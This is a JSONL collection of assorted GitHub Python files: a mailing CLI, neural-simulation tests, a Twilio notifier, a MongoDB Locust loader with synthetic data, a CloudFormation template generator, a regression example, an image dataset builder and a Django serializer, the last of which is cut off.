+{"seq_id":"41024698298","text":"import click\nimport structlog\nfrom flask.cli import with_appcontext\n\nfrom inspirehep.mailing.api.jobs import (\n get_jobs_from_last_week,\n get_jobs_weekly_html_content,\n)\nfrom inspirehep.mailing.providers.mailtrain import (\n mailtrain_update_weekly_campaign_content,\n)\n\nLOGGER = structlog.getLogger()\n\n\n@click.group()\ndef mailing():\n \"\"\"Command to handle mailing.\"\"\"\n\n\n@mailing.command(\n help=\"Updates the Atom feed for the weekly campaign with the INSPIRE jobs posted last week.\"\n)\n@with_appcontext\ndef update_weekly_jobs():\n click.secho(\"Searching for jobs posted last week\")\n jobs = get_jobs_from_last_week()\n if not jobs:\n click.secho(\"No jobs found from last week skipping...\", fg=\"red\")\n return\n\n click.secho(f\"Found {len(jobs)} job records from last week.\", fg=\"green\")\n\n content = get_jobs_weekly_html_content(jobs)\n if not mailtrain_update_weekly_campaign_content(content):\n click.secho(\"There was a problem with updating Atom Feed\")\n exit(1)\n\n click.secho(\"Campaign updated.\", fg=\"green\")\n","repo_name":"inspirehep/inspirehep","sub_path":"backend/inspirehep/mailing/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"}
+{"seq_id":"40796820327","text":"import pytest\n\npytest.importorskip(\"torch\")\npytest.importorskip(\"sinabs.exodus\")\n\n\ndef test_spike_clipping():\n from rockpool.nn.modules.torch.lif_torch import StepPWL, PeriodicExponential\n from rockpool.nn.modules.torch import LIFBitshiftTorch\n from rockpool.nn.modules import LIFTorch\n import torch\n\n max_spikes_per_dt = 31\n\n n_synapses = 5\n n_neurons = 10\n n_batches = 3\n T = 40\n tau_mem = torch.rand(n_neurons)\n tau_syn = 0.05\n threshold = 1.34\n\n # - Test maximal initialisation\n mod_xylo_step = LIFTorch(\n shape=(n_synapses * n_neurons, n_neurons),\n tau_mem=tau_mem,\n tau_syn=tau_syn,\n has_rec=False,\n dt=1e-3,\n noise_std=0.0,\n spike_generation_fn=StepPWL,\n threshold=threshold,\n max_spikes_per_dt=max_spikes_per_dt,\n )\n mod_xylo_periodic = LIFTorch(\n shape=(n_synapses * n_neurons, n_neurons),\n tau_mem=tau_mem,\n tau_syn=tau_syn,\n has_rec=False,\n dt=1e-3,\n noise_std=0.0,\n spike_generation_fn=PeriodicExponential,\n threshold=threshold,\n max_spikes_per_dt=max_spikes_per_dt,\n )\n mod = LIFTorch(\n shape=(n_synapses * n_neurons, n_neurons),\n tau_mem=tau_mem,\n tau_syn=tau_syn,\n has_rec=False,\n dt=1e-3,\n noise_std=0.0,\n threshold=threshold,\n )\n mod_bitshift = LIFBitshiftTorch(\n shape=(n_synapses * n_neurons, n_neurons),\n tau_mem=tau_mem,\n tau_syn=tau_syn,\n has_rec=False,\n dt=1e-3,\n noise_std=0.0,\n threshold=threshold,\n )\n\n # - Generate some data\n input_data = 0.5 * torch.ones(n_batches, T, n_synapses * n_neurons)\n\n # - test that number of spikes does not exceed 15\n out, _, rd = mod(input_data, record=True)\n out_xylo_step, _, rd_xylo_step = mod_xylo_step(input_data, record=True)\n out_xylo_periodic, _, _ = mod_xylo_periodic(input_data, record=True)\n # - test default gradient of xylo\n out_bitshift, _, _ = mod_bitshift(input_data, record=True)\n\n assert torch.any(\n out > max_spikes_per_dt\n ), \"Test not possible: No time-points where neurons produced more than spike limit\"\n assert torch.all(\n out_xylo_step <= max_spikes_per_dt\n ), \"Some time-steps had too many events\"\n assert torch.all(\n out_xylo_periodic <= max_spikes_per_dt\n ), \"Some time-steps had too many events\"\n assert torch.all(\n out_bitshift <= max_spikes_per_dt\n ), \"Some time-steps had too many events\"\n\n # - test that membrane potential is not reset entirely when spikes are clipped\n batch = 0\n neuron = 0\n\n t_spike = torch.where(out[batch, :, neuron] > max_spikes_per_dt)[0][0]\n vmem = rd[\"vmem\"][batch, :, neuron]\n vmem_xylo_step = rd_xylo_step[\"vmem\"][batch, :, neuron]\n spike_diff = (\n out[batch, : t_spike + 1, neuron] - out_xylo_step[batch, : t_spike + 1, neuron]\n )\n assert torch.allclose(\n vmem[: t_spike + 1], vmem_xylo_step[: t_spike + 1] - spike_diff * threshold\n )\n\n if torch.cuda.is_available():\n from rockpool.nn.modules import LIFExodus\n\n mod_slayer = LIFExodus(\n shape=(n_synapses * n_neurons, n_neurons),\n tau_mem=tau_mem[0].item(),\n tau_syn=tau_syn,\n has_rec=False,\n dt=1e-3,\n noise_std=0.0,\n threshold=threshold,\n ).cuda()\n mod_slayer_xylo = LIFExodus(\n shape=(n_synapses * n_neurons, n_neurons),\n tau_mem=tau_mem[0].item(),\n tau_syn=tau_syn,\n has_rec=False,\n dt=1e-3,\n noise_std=0.0,\n threshold=threshold,\n max_spikes_per_dt=max_spikes_per_dt,\n ).cuda()\n\n out_slayer, _, rd_slayer = mod_slayer(input_data.cuda(), record=True)\n out_slayer_xylo, _, rd_slayer_xylo = mod_slayer_xylo(\n input_data.cuda(), record=True\n )\n\n assert torch.any(\n out_slayer > max_spikes_per_dt\n ), \"Test 
not possible: No time-points where neurons produced more than spike limit\"\n assert torch.all(\n out_slayer_xylo <= max_spikes_per_dt\n ), \"Some time-steps had too many events\"\n\n t_spike = torch.where(out_slayer[batch, :, neuron] > 15)[0][0]\n vmem = rd_slayer[\"vmem\"][batch, :, neuron]\n vmem_slayer_xylo = rd_slayer_xylo[\"vmem\"][batch, :, neuron]\n spike_diff = (\n out_slayer[batch, : t_spike + 1, neuron]\n - out_slayer_xylo[batch, : t_spike + 1, neuron]\n )\n assert torch.allclose(\n vmem[: t_spike + 1],\n vmem_slayer_xylo[: t_spike + 1] - spike_diff * threshold,\n )\n","repo_name":"synsense/rockpool","sub_path":"tests/tests_default/test_surrogate_gradients.py","file_name":"test_surrogate_gradients.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"3"}
+{"seq_id":"41069067162","text":"from twilio.rest import Client\nimport os\n\nclass TwilioHandler:\n def __init__(self,parent):\n self.account_sid =os.environ.get(\"hoi_t_account_sid\")\n self.auth_token = os.environ.get(\"hoi_t_auth_token\")\n self.phone_number = os.environ.get(\"hoi_t_phone_number\")\n self.client = Client(self.account_sid, self.auth_token)\n self.parent = parent\n\n def send_notification(self,body,to):\n try:\n self.client.messages.create(\n body=body,\n from_=self.phone_number,\n to= to)\n self.parent.console_logger.log_generic_row(f\"Sending Notification to {to}!\",\"green\")\n except:\n pass\n \n def send_notifications_to_all(self,message):\n contacts = self.parent.contacts.keys()\n for contact in contacts:\n self.send_notification(message,self.parent.contacts[contact])\n self.parent.console_logger.log_generic_row(\"Sent all contacts a notification!\",\"green\")","repo_name":"House-of-IoT/HOI-GeneralServer","sub_path":"ThirdPartyHandlers/twilio_handler.py","file_name":"twilio_handler.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"1868041646","text":"#!/usr/bin/env python\n\n########################################################################\n#\n# Recommended Usage:\n# Users: 1 * workers\n# Host: srv|db|coll|bulksize\n#\n########################################################################\n\n########################################################################\n#\n# Many of you like to get fancy by creating separate object classes\n# and external file dependencies, e.g. json files, \n# I discourage you from doing that because there are file path\n# reference issues that make things difficult when you containerize\n# and deploy to gke. Try to keep everything in this 1 file.\n# The only exception to this rule are faker models which need to be\n# pre-built and tested and checked in.\n#\n########################################################################\n\n# Allows us to make many pymongo requests in parallel to overcome the single threaded problem\nimport gevent\n_ = gevent.monkey.patch_all()\n\n########################################################################\n# Add any additional imports here.\n# But make sure to include in requirements.txt\n########################################################################\nimport pymongo\nfrom bson import json_util\nfrom bson.json_util import loads\nfrom bson import ObjectId\nfrom locust import User, events, task, constant, tag, between\nimport time\nfrom pickle import TRUE\nfrom datetime import datetime, timedelta\nimport random\nfrom bson.decimal128 import Decimal128\nfrom decimal import Decimal\nimport string\nfrom mimesis import Person\nfrom mimesis.locales import Locale\nfrom mimesis.enums import Gender\nfrom mimesis import Address\nfrom mimesis import Generic\nfrom mimesis.schema import Field, Schema\n\n# mimesis schema for bulk creation\n# Note that increment doesn't maintain unique sequence numbers if you are running multiple mlocust users in parallel\n# Not every api func has been used. The full api can be found here. https://mimesis.name/en/master/api.html\n# TODO Only use what you need. 
The more logic you have the slower your schema generation will be.\n_ = Field(locale=Locale.EN)\nschema = Schema(schema=lambda: {\n \"pk\": _(\"increment\"),\n \"uid\": _(\"uuid\"),\n \"customCode\": _(\"random.custom_code\", mask=\"@###\", char=\"@\", digit=\"#\"),\n \"genStr\": _(\"random.generate_string\", str_seq=\"abcdefg123456789\", length=8),\n \"randintArray\": _(\"random.randints\", amount=3, a=1, b=10000),\n \"randstr\": _(\"random.randstr\", unique=False, length=10),\n \"uniform\": _(\"random.uniform\", a=1.2, b=4.5, precision=10),\n \"randomBytes\": _(\"random.urandom\", size=4),\n \"address\": {\n \"addr\": _(\"address.address\"),\n \"callingCode\": _(\"address.calling_code\"),\n \"city\": _(\"address.city\"),\n \"continent\": _(\"address.continent\"),\n \"coords\": _(\"address.coordinates\"),\n \"country\": _(\"address.country\"),\n \"countryCd\": _(\"address.country_code\"),\n \"federalSubj\": _(\"address.federal_subject\"),\n \"lat\": _(\"address.latitude\"),\n \"lng\": _(\"address.longitude\"),\n \"postalCd\": _(\"address.postal_code\"),\n \"prefecture\": _(\"address.prefecture\"),\n \"province\": _(\"address.province\"),\n \"region\": _(\"address.region\"),\n \"state\": _(\"address.state\", abbr=False),\n \"streetNm\": _(\"address.street_name\"),\n \"streetNum\": _(\"address.street_number\", maximum=2999),\n \"streetSuffix\": _(\"address.street_suffix\"),\n \"zip\": _(\"address.zip_code\")\n },\n \"finance\": {\n \"company\": _(\"finance.company\"),\n \"companyType\": _(\"finance.company_type\", abbr=False),\n \"price\": _(\"finance.price\", minimum=10, maximum=1000),\n \"stockNm\": _(\"finance.stock_name\"),\n \"stockTicker\": _(\"finance.stock_ticker\")\n },\n \"payment\": {\n \"cid\": _(\"payment.cid\"),\n \"cvv\": _(\"payment.cvv\"),\n \"expDt\": _(\"payment.credit_card_expiration_date\", minimum=16, maximum=25),\n \"ccNetwork\": _(\"payment.credit_card_network\"),\n \"ccNum\": _(\"payment.credit_card_number\")\n },\n \"ts\": _(\"datetime.datetime\", start=2000, end=2023),\n \"formattedDt\": _(\"datetime.formatted_date\", fmt=\"%Y-%m-%d\"),\n \"month\": _(\"datetime.month\", abbr=False),\n \"year\": _(\"datetime.year\", minimum=1990, maximum=2023),\n \"food\": {\n \"dish\": _(\"food.dish\"),\n \"drink\": _(\"food.drink\"),\n \"fruit\": _(\"food.fruit\")\n },\n \"text\": {\n \"alphabet\": _(\"text.alphabet\", lower_case=False),\n \"answer\": _(\"text.answer\"),\n \"color\": _(\"text.color\"),\n \"hexColor\": _(\"text.hex_color\"),\n \"level\": _(\"text.level\"),\n \"quote\": _(\"text.quote\"),\n \"sentence\": _(\"text.sentence\"),\n \"paragraph\": _(\"text.text\", quantity=3),\n \"title\": _(\"text.title\"),\n \"word\": _(\"text.word\"),\n \"wordArray\": _(\"text.words\", quantity=3),\n },\n \"code\": {\n \"imei\": _(\"code.imei\"),\n \"isbn\": _(\"code.isbn\"),\n \"issn\": _(\"code.issn\", mask=\"###-##-####\"),\n \"pin\": _(\"code.pin\", mask=\"####\"),\n },\n \"hash\": _(\"cryptographic.hash\"),\n \"bool\": _(\"boolean\"),\n \"dsn\": _(\"dsn\"),\n \"os\": _(\"os\"),\n \"progLang\": _(\"programming_language\"),\n \"version\": _(\"version\", pre_release=True),\n \"timestamp\": _(\"timestamp\", posix=False),\n \"numeric\": {\n \"int\": _(\"numeric.integer_number\", start=-1000, end=1000),\n \"intArray\": _(\"numeric.integers\", start=-1000, end=1000, n=5),\n \"float\": _(\"numeric.float_number\", start=-1000.0, end=1000.0, precision=7),\n \"floatArray\": _(\"numeric.floats\", start=-1000.0, end=1000.0, n=5, precision=7),\n },\n \"internet\": {\n \"content_type\": 
_(\"internet.content_type\"),\n \"emoji\": _(\"internet.emoji\"),\n \"hashtagArray\": _(\"internet.hashtags\", quantity=3),\n \"hostname\": _(\"internet.hostname\"),\n \"httpMethod\": _(\"internet.http_method\"),\n \"httpStatusCd\": _(\"internet.http_status_code\"),\n \"httpStatusMsg\": _(\"internet.http_status_message\"),\n \"ipv4\": _(\"internet.ip_v4_with_port\"),\n \"ipv6\": _(\"internet.ip_v6\"),\n \"macAddr\": _(\"internet.mac_address\"),\n \"port\": _(\"internet.port\"),\n \"publicDns\": _(\"internet.public_dns\"),\n \"queryParams\": _(\"internet.query_parameters\", length=3),\n \"queryString\": _(\"internet.query_string\", length=3),\n \"uri\": _(\"internet.uri\"),\n \"url\": _(\"internet.url\"),\n \"userAgent\": _(\"internet.user_agent\")\n },\n \"file\": {\n \"nm\": _(\"file.file_name\"),\n \"ext\": _(\"file.extension\"),\n \"size\": _(\"file.size\", minimum=1, maximum=100)\n },\n \"owner\": {\n \"name\": _(\"person.name\"),\n \"first\": _(\"person.first_name\"),\n \"last\": _(\"person.last_name\"),\n \"gender\": _(\"person.gender\"),\n \"nationality\": _(\"person.nationality\"),\n \"title\": _(\"person.title\"),\n \"occupation\": _(\"person.occupation\"),\n \"lang\": _(\"person.language\"),\n \"phone\": _(\"person.telephone\"),\n \"height\": _(\"person.height\", minimum=1.5, maximum=2),\n \"weight\": _(\"person.weight\", minimum=38, maximum=90),\n \"email\": _(\"person.email\", key=str.lower),\n \"username\": _(\"person.username\"),\n \"password\": _(\"person.password\"),\n \"token\": _(\"token_hex\"),\n \"creator\": _(\"full_name\", gender=Gender.FEMALE),\n },\n})\n\n########################################################################\n# Even though locust is designed for concurrency of simulated users,\n# given how resource intensive fakers/bulk inserts are,\n# you should only run 1 simulated user / worker else you'll kill the \n# CPU of the workers.\n########################################################################\nclass MetricsLocust(User):\n ########################################################################\n # Class variables. The values are initialized with None\n # till they get set from the actual locust exeuction \n # when the host param is passed in.\n # DO NOT MODIFY! PASS IN VIA HOST PARAM.\n ########################################################################\n # DO NOT MODIFY! PASS IN VIA HOST PARAM.\n client, coll, audit, bulk_size = None, None, None, None\n\n global schema\n\n ####################################################################\n # Unlike a standard locust file where we throttle requests on a per\n # second basis, since we are trying to load data asap, there will \n # be no throttling\n ####################################################################\n\n def __init__(self, parent):\n super().__init__(parent)\n\n # We can't put this in the singleton because we can't modify the params after it's been run once, \n # e.g. 
run new test with a different host param\n # Parse out env variables from the host\n vars = self.host.split(\"|\")\n srv = vars[0]\n print(\"SRV:\",srv)\n self.client = pymongo.MongoClient(srv)\n\n db = self.client[vars[1]]\n self.coll = db[vars[2]]\n\n # docs to insert per batch insert\n self.bulk_size = int(vars[3])\n print(\"Batch size from Host:\",self.bulk_size)\n\n schema.create(iterations=self.bulk_size)\n\n # Singleton\n if (self.audit is None):\n # Log all application exceptions (and audits) to the same cluster\n self.audit = self.client.mlocust.audit\n\n ################################################################\n # Example helper function that is not a Locust task.\n # All Locust tasks require the @task annotation\n # You have to pass the self reference for all helper functions\n ################################################################\n def get_time(self):\n return time.time()\n\n ################################################################\n # Audit should only be intended for logging errors\n # Otherwise, it impacts the load on your cluster since it's\n # extra work that needs to be performed on your cluster \n ################################################################\n def audit_err(self, type, msg):\n print(\"Audit: \", msg)\n self.audit.insert_one({\"type\":type, \"ts\":self.get_time(), \"msg\":str(msg)})\n\n ################################################################\n # Since the loader is designed to be single threaded with 1 user\n # There's no need to set a weight to the task.\n # Do not create additional tasks in conjunction with the loader\n # If you are testing running queries while the loader is running\n # deploy 2 clusters in mLocust with one running faker and the\n # other running query tasks\n # The reason why we don't want to do both loads and queries is\n # because of the simultaneous users and wait time between\n # requests. The bulk inserts can take longer than 1s possibly\n # which will cause the workers to fall behind.\n ################################################################\n # TODO 0 this out if doing normal load\n @task(1)\n def _bulkinsert(self):\n # Note that you don't pass in self despite the signature above\n tic = self.get_time();\n name = \"bulkinsert\";\n \n try:\n # self.coll.insert_many([self.gen.create() for _ in range(self.bulk_size)], ordered=False)\n self.coll.insert_many(schema*self.bulk_size, ordered=False)\n\n events.request_success.fire(request_type=\"pymongo\", name=name, response_time=(self.get_time()-tic)*1000, response_length=0)\n except Exception as e:\n events.request_failure.fire(request_type=\"pymongo\", name=name, response_time=(self.get_time()-tic)*1000, response_length=0, exception=e)\n self.audit_err(\"exception\", e)\n # Add a sleep for just faker gen so we don't hammer the system with file not found ex\n time.sleep(5)\n","repo_name":"10gen/mlocust-app","sub_path":"docker-image/locust-tasks/locustfile-mimesis.py","file_name":"locustfile-mimesis.py","file_ext":"py","file_size_in_byte":11839,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"}
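# --- Illustrative sketch (added; not part of the original record). ---
# The same Field/Schema pattern the loader above uses, in miniature
# (assumes a mimesis version matching the create(iterations=...) API
# used in the record):
from mimesis.locales import Locale
from mimesis.schema import Field, Schema

field = Field(locale=Locale.EN)
mini_schema = Schema(schema=lambda: {
    "pk": field("increment"),                       # sequential id
    "email": field("person.email", key=str.lower),  # lower-cased email
})
docs = mini_schema.create(iterations=3)  # three dicts, ready for insert_many
print(docs)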
+{"seq_id":"10900851732","text":"import click\nimport requests\nfrom cfn_flip import to_yaml\nimport json\nimport os\nimport logging\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\nlogging.basicConfig(\n format=\"%(levelname)s %(threadName)s [%(filename)s:%(lineno)d] %(message)s\",\n datefmt=\"%Y-%m-%d:%H:%M:%S\",\n level=logging.INFO,\n)\n\n\n@click.group()\ndef cli():\n \"\"\"cli\"\"\"\n pass\n\n\ndef generate(type, specification, include_optional, property_types, friendly_name):\n logger.info(f\"Generating: {type}\")\n parameters = {}\n resource_properties = {}\n for property_name, property in specification.get('Properties', {}).items():\n logger.info(f\"looking at property: {property_name}\")\n is_optional = not property.get('Required')\n required = property.get('Required')\n if required or (is_optional and include_optional):\n if property.get('PrimitiveType') is not None:\n parameters[f\"{friendly_name}{property_name}\"] = {\n 'Type': property.get('PrimitiveType').replace('Integer', \"Number\").replace(\"Boolean\", \"String\"),\n 'Description': property.get('Documentation')\n }\n if property.get('PrimitiveType') == \"Boolean\":\n parameters[f\"{friendly_name}{property_name}\"]['AllowedValues'] = [\"true\", \"false\"]\n if not property.get('Required'):\n parameters[f\"{friendly_name}{property_name}\"]['Default'] = None\n resource_properties[property_name] = {\"Ref\": f\"{friendly_name}{property_name}\"}\n elif property.get('Type') == \"List\":\n pass\n elif property.get('Type') == \"Map\":\n pass\n else:\n property_type = f\"{type}.{property.get('Type')}\"\n spec = property_types.get(property_type)\n logger.info(f\"spec for {property_type} was {spec}\")\n p, r, o = generate(\n type,\n property_types.get(property_type),\n include_optional,\n property_types,\n f\"{friendly_name}{property.get('Type')}\"\n )\n resource_properties[property_name] = r\n parameters.update(p)\n\n outputs = {}\n for attribute in specification.get('Attributes', []):\n outputs[f\"{friendly_name}{attribute}\"] = {\n \"Value\": {\"GetAtt\": [\"Resource\", attribute]}\n }\n\n return parameters, resource_properties, outputs\n\n\n@cli.command()\n@click.argument('region')\n@click.argument('type')\n@click.option('--include-optional/--no-include-optional', default=False)\ndef make_me_a(region, type, include_optional):\n source = f\"https://cfn-resource-specifications-{region}-prod.s3.{region}.amazonaws.com/latest/gzip/CloudFormationResourceSpecification.json\"\n response = requests.get(source)\n content = response.json()\n result = generate_a(content, type, include_optional)\n click.echo(result)\n\n\ndef generate_a(content, type, include_optional):\n property_types = content.get('PropertyTypes')\n resources = content.get('ResourceTypes')\n specification = resources.get(type)\n parameters, resource_properties, outputs = generate(type, specification, include_optional, property_types, \"\")\n result = dict(\n AWSTemplateFormatVersion=\"2010-09-09\",\n Description=specification.get('Documentation'),\n )\n if len(parameters.keys()) > 0:\n result['Parameters'] = parameters\n result['Resources'] = {\n \"Resource\": {\n \"Type\": type,\n \"Description\": specification.get('Documentation'),\n }\n }\n if len(resource_properties.items()) > 0:\n result['Resources'][\"Resource\"][\"Properties\"] = resource_properties\n if len(outputs.keys()) > 0:\n result['Outputs'] = outputs\n return to_yaml(json.dumps(result))\n\n\n@cli.command()\n@click.argument('region')\n@click.argument('output', 
type=click.Path(exists=True))\n@click.option('--include-optional/--no-include-optional', default=False)\ndef make_me_all(region, output, include_optional):\n source = f\"https://cfn-resource-specifications-{region}-prod.s3.{region}.amazonaws.com/latest/gzip/CloudFormationResourceSpecification.json\"\n response = requests.get(source)\n content = response.json()\n version = content.get('ResourceSpecificationVersion')\n resource_types = content.get('ResourceTypes')\n for resource_type in resource_types.keys():\n result = generate_a(content, resource_type, include_optional)\n out = os.path.join(output, resource_type.replace(\"::\", \"-\"), version)\n if not os.path.exists(out):\n os.makedirs(out)\n with open(os.path.join(out, f\"product.template-{region}.yaml\"), 'w') as f:\n f.write(result)\n\n\n@cli.command()\n@click.argument('region')\ndef get_current_resource_specification_version(region):\n source = f\"https://cfn-resource-specifications-{region}-prod.s3.{region}.amazonaws.com/latest/gzip/CloudFormationResourceSpecification.json\"\n response = requests.get(source)\n content = response.json()\n click.echo(content.get('ResourceSpecificationVersion'))\n\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"eamonnfaherty/service-catalog-product-maker","sub_path":"servicecatalog_product_maker/product_maker.py","file_name":"product_maker.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
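# --- Illustrative sketch (added; not part of the original record). ---
# generate_a() only needs the parsed specification dict, so it can be
# exercised offline against a tiny hand-written spec; Demo::Thing and its
# fields are entirely made up (assumes generate_a from the record is in
# scope and cfn_flip is installed).
demo_spec = {
    "PropertyTypes": {},
    "ResourceTypes": {
        "Demo::Thing": {
            "Documentation": "https://example.com/demo-thing",
            "Properties": {
                "Name": {"PrimitiveType": "String", "Required": True,
                         "Documentation": "The thing's name."},
            },
            "Attributes": {"Arn": {}},
        }
    },
}
print(generate_a(demo_spec, "Demo::Thing", include_optional=False))  # small YAML template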
+{"seq_id":"70257994962","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport os\nimport sys\n\n\nsys.path.append(\"..\")\nfrom tools.linear_regression.linear_regression import LinReg\n\n#linear regression with one independent variable \n\n#load dataset\ndir_path = os.path.dirname(os.path.realpath(__file__))\nsource = os.path.join(dir_path, 'data', 'weight-height.csv')\ndf = pd.read_csv(source)\n\n#restrict to one gender\nfemales = df[df['Gender'] == 'Female']\n\n#determine independent (x) and dependent (y) variable\nx = females['Weight'].tolist()\ny = females['Height'].tolist()\n\n#initialize regression class\nregress = LinReg(x,y, columns=['weight', 'height'])\n\n#describe dependent variable\nregress.y_stats(report=True, write='results/weight_height.txt')\n\n#fit data - use OLS\nregress.fit(method='ordinary')\nregress.analyse(se_samples=20, report=True, write='results/weight_height.txt', add_note=True)\nregress.evaluate()\n\n#visualize results\nplt.scatter(x,y)\nplt.title('Female Height and Weight (5000 samples) inkl. Best Fit')\nplt.ylabel('Height in inches')\nplt.xlabel('Weight in lbs')\nplt.plot(x, [regress.beta[0] + regress.beta[1]*xi for xi in x], color='red')\nplt.savefig('results/weight_height_graph.png') \nplt.show()\n\n#predict \nprediction = regress.predict(120)\nprint('Prediction: the person will weigh', prediction, 'lbs')\n\n\n\n\n\n\n","repo_name":"pdoms/project_i","sub_path":"src/examples/weight_height.py","file_name":"weight_height.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"27577826846","text":"import unittest\r\nimport master\r\nfrom master import Book\r\nfrom master import UserBorrowedBooks\r\nfrom master import LibraryUser\r\nfrom master import BookStatuses\r\nimport datetime\r\n\r\nclass testMaster(unittest.TestCase):\r\n \r\n def setUp(self):\r\n user = {\"_username\": \"thiennguyen\", \"_first_name\": \"Thien\", \"_last_name\": \"Nguyen\", \"_email\": \"thien.nguyen@gmail.com\"}\r\n master.create_user_if_not_exists(user)\r\n book = {\"_id\": 1, \"_title\": \"Book1\", \"_isbn\": \"11111111\", \"_author\": \"unknown\", \"_published_date\" : \"1/1/1999\"}\r\n borrowing_book = Book(id=book[\"_id\"], title=book[\"_title\"], isbn=book[\"_isbn\"], author=book[\"_author\"], published_date=book[\"_published_date\"])\r\n master.session.add(borrowing_book)\r\n master.session.commit()\r\n #master.main()\r\n\r\n \r\n def test_current_userer(self):\r\n user = master.session.query(LibraryUser).filter(LibraryUser.username == \"thiennguyen\").first()\r\n self.assertTrue(user[\"_username\"] is not None)\r\n self.assertTrue(user[\"_first_name\"] is not None)\r\n self.assertTrue(user[\"_last_name\"] is not None)\r\n self.assertTrue(user[\"_email\"] is not None)\r\n\r\n def test_borrow_book(self):\r\n borrowing_user = master.session.query(LibraryUser).filter(LibraryUser.username == \"thiennguyen\").first()\r\n borrowing_book = master.session.query(Book).filter(Book.id == 1).first()\r\n event = master.add_borrowed_event(borrowing_book, borrowing_user)\r\n borrow = UserBorrowedBooks(library_user_id=borrowing_user.id, book_id=int(borrowing_book.id),status=BookStatuses.borrowed, borrowed_date=datetime.today().date(),calendar_event_id=event.get(\"id\"))\r\n master.session.add(borrow)\r\n master.session.commit()\r\n self.assertTrue(master.session.query(UserBorrowedBooks).filter(UserBorrowedBooks.book_id == 1).first is not None)\r\n \r\n def test_return_book(self):\r\n returning_book = master.session.query(Book).filter(Book.id == 1).first()\r\n returning_book.status = BookStatuses.returned\r\n master.session.commit()\r\n test_book = master.session.query(Book).filter(Book.id == 1).first()\r\n self.assertTrue(test_book.status == BookStatuses.returned)","repo_name":"s3714217/IOT-OnlineLibrary","sub_path":"master/master_test.py","file_name":"master_test.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18767463523","text":"#Training 用のデータセットの作成\n#保存形式はnpy 形式で保存するつもり\n#データ配列の形状は[num_images, 1, 41, 41]になるはず?\nimport numpy as np\nimport cv2\nimport os\nimport sys\nfrom joblib import Parallel, delayed\n\n#parameter\nSIZE_INPUT = 41\nSIZE_LABEL = 41\nSCALE = 3\nSTRIDE = 11\n\n#path 情報\nimage_path = '../images/91_images_aug/'\n#image_path = '../images/general_100_aug/'\nimage_paths = os.listdir(image_path)\n\n#初期化\ntrain = None\nlabel = None\npadding = np.abs(SIZE_INPUT - SIZE_LABEL) / 2\n\n#ループ情報\nlength = len(image_paths)\nim_no = 0\n#データ生成\n#並列化 関数\ndef gen_train(i):\n c = 0\n #chainer ではfloat32を読み込むがmatlab版では倍精度に変換している\n image = cv2.imread(image_path+i)\n image = (cv2.cvtColor(image, cv2.COLOR_BGR2YCR_CB)[:, :, 0]).astype(np.float64)\n #画像サイズの調整\n size = np.array(image.shape)\n size = size - size % SCALE\n #ラベル用画像\n image_label = image[0:size[0], 0:size[1]]\n height, width = image_label.shape\n #中間縮小画像\n buf = cv2.resize(image_label, (width//SCALE, height//SCALE), \\\n interpolation=cv2.INTER_CUBIC)\n #入力用画像\n image_input = cv2.resize(buf, (width, height), \\\n interpolation=cv2.INTER_CUBIC)\n #各画像を入力サイズに切り分けていく\n for x in range(0, height - SIZE_INPUT + 1, STRIDE):\n for y in range(0, width - SIZE_INPUT + 1, STRIDE):\n subim_input = image_input[np.newaxis, np.newaxis, x:x+SIZE_INPUT, y:y+SIZE_INPUT]/255\n subim_label = image_label[np.newaxis, np.newaxis, x:x+SIZE_INPUT, y:y+SIZE_INPUT]/255\n\n #雑魚セクション\n _data = np.concatenate([subim_input, subim_label], axis=0)\n np.save('../images/Yang91_npy_float64/' + str(i.split('.')[0]) + '_' + str(c) + '.npy', _data)\n c += 1\n#並列処理\nParallel(n_jobs=-1, verbose=5)([delayed(gen_train)(i) for i in image_paths])\nprint(\"saved data to npy\")\n","repo_name":"shimo8810/DRLSR","sub_path":"src/generate_train.py","file_name":"generate_train.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23516951731","text":"from rest_framework import serializers, status\nfrom v1.commonapp.serializers.tenant import TenantMasterViewSerializer\nfrom v1.commonapp.serializers.utility import UtilityMasterViewSerializer\nfrom v1.store.models.store_type import StoreType as StoreTypeTbl\nfrom django.db import transaction\nfrom datetime import datetime\nfrom v1.commonapp.views.custom_exception import CustomAPIException\nfrom api.messages import NAME_ALREADY_EXIST\nfrom v1.store.views.common_functions import set_store_type_vaidated_data\n\nclass StoreTypeListSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = StoreTypeTbl\n fields = ('id_string', 'name','is_active','created_by','created_date')\n\n\nclass StoreTypeViewSerializer(serializers.ModelSerializer):\n tenant = serializers.ReadOnlyField(source='tenant.name')\n tenant_id_string = serializers.ReadOnlyField(source='tenant.id_string')\n utility = serializers.ReadOnlyField(source='utility.name')\n utility_id_string = serializers.ReadOnlyField(source='utility.id_string')\n\n class Meta:\n model = StoreTypeTbl\n fields = ('id_string', 'name', 'tenant','tenant_id_string','utility','utility_id_string')\n\nclass StoreTypeSerializer(serializers.ModelSerializer):\n name = serializers.CharField(required=True, max_length=200)\n utility_id = serializers.CharField(required=True, max_length=200)\n tenant_id = serializers.CharField(required=True, max_length=200)\n\n class Meta:\n model = StoreTypeTbl\n fields = ('__all__')\n\n def create(self, validated_data, user):\n with transaction.atomic():\n validated_data = set_store_type_vaidated_data(validated_data)\n if StoreTypeTbl.objects.filter(name=validated_data['name'],tenant_id=validated_data['tenant_id'],\n utility_id=validated_data['utility_id']).exists():\n raise CustomAPIException(NAME_ALREADY_EXIST, status_code=status.HTTP_409_CONFLICT)\n else:\n 